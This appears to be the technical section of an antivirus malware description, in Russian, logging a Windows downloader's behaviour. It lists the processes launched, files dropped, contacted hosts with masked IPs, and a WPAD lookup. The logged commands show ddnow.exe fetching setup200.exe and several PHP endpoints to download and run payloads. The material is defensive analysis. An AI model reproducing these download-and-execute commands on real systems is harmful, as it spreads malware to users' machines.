Техническая информация
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.193.33/run1.php?a=########" "a" "<LS_APPDATA>\run1.txt"
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/setup200.exe" ";Ok" "setupone74111615.exe"
- '<SYSTEM32>\ntvdm.exe' -f -i1
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 352
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/soid1.php?p=#############" "aa" "aatxtname.txt"
- '<LS_APPDATA>\tinstall.exe'
- '<LS_APPDATA>\ddnow.exe' "http://16#.#22.194.89/goet1.php?p=#####################" ";45uavf44qfx;0-$fire-ATSpywaregot--L$cgot-<Полный путь к файлу>;0" "47531236.txt"
- <LS_APPDATA>\run1.txt
- <LS_APPDATA>\aatxtname.txt
- <LS_APPDATA>\47531236.txt
- %WINDIR%\Temp\scs4.tmp
- %WINDIR%\Temp\scs3.tmp
- <LS_APPDATA>\setupone74111615.exe
- %TEMP%\1D089.dmp
- <LS_APPDATA>\tinstall.exe
- <LS_APPDATA>\ddnow4.exe
- <LS_APPDATA>\ddnow.exe
- %TEMP%\dw.log
- %TEMP%\nsy2.tmp\SimpleFC.dll
- <LS_APPDATA>\tinstall4.exe
- %WINDIR%\Temp\scs3.tmp
- %WINDIR%\Temp\scs4.tmp
- <LS_APPDATA>\47531236.txt
- <LS_APPDATA>\run1.txt
- <LS_APPDATA>\run1.txt
- '16#.#22.193.33':80
- '16#.#22.194.89':80
- 'wp#d':80
- http://11#.#11.111.1/wpad.dat via wp#d
- http://16#.#22.193.33/run1.php?a=########
- http://16#.#22.194.89/setup200.exe
- http://16#.#22.194.89/goet1.php?p=#####################
- http://16#.#22.194.89/soid1.php?p=#############
- DNS ASK wp#d
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-cf4.cfc.380001'
- ClassName: 'Shell_TrayWnd' WindowName: ''